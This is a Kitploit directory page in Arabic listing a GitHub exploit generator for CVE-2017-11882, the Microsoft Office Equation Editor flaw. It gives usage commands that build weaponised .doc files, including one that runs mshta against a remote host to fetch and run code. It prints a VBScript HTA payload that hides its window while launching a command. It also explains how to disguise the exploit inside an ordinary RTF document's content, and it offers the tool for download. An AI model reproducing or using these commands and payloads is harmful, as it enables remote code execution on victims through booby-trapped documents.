Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-11882 — CVE-2017-11882 من https://github.com/embedi/CVE-2017-11882 | Kitploit
أدوات/GitHubGitHub/ridter/cve-2017-11882
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubridter/cve-2017-11882

CVE-2017-11882

CVE-2017-11882 من https://github.com/embedi/CVE-2017-11882

عرض المستودع
535242منذ 8 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-11882

43b النص الأصلي من https://github.com/embedi/CVE-2017-11882

109b النص الأصلي من https://github.com/unamer/CVE-2017-11882/ (تحية، الآن كود unamer يمكنه تنفيذ شيلكود~)

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

الاستخدام

root@kitploit:~
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

استخدم mshta

root@kitploit:~
python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

abc

root@kitploit:~
<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD> 
</HTML> 

طول الأمر لـ 43b لا يتجاوز 43 بايت، طول الأمر لـ 109b لا يتجاوز 109 بايت

مثال استغلال لـ CVE-2017-11882 (بدء تشغيل calc.exe كحمولة)

مجلد example يحتوي على ملف .rtf يستغل ثغرة CVE-2017-11882 ويقوم بتشغيل الآلة الحاسبة في النظام.

حول المحتوى المخصص

في الواقع، طريقة المحتوى المخصص تعلمتها من خبراء آخرين، وقد كتبتها كسكريبت منذ فترة طويلة. لم أكن أنوي نشره في البداية، ولكن بعد أن رأيت أحد أعضاء الفريق قد نشره، لم يكن أمامي خيار سوى نشره. الطريقة بسيطة جدًا: فقط افتح مستند rtf عادي في محرر نصوص، انسخ كل المحتوى قبل {\*\datastore، واستبدل كل المحتوى قبل {\object\objautlink\objupdate، لذا كتابتها في سكريبت أمر بسيط جدًا.

طريقة استخدام المحتوى المخصص، اختر أي سكريبت:

root@kitploit:~
python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc -i input.rtf

المحتوى المخصص موجود في input.rtf.

بخصوص سكريبت unamer الأخير الذي يبلغ طوله 605 بايت، لن أقوم بتحديثه، يمكن للمهتمين تعديله بأنفسهم.

تنزيل الأداة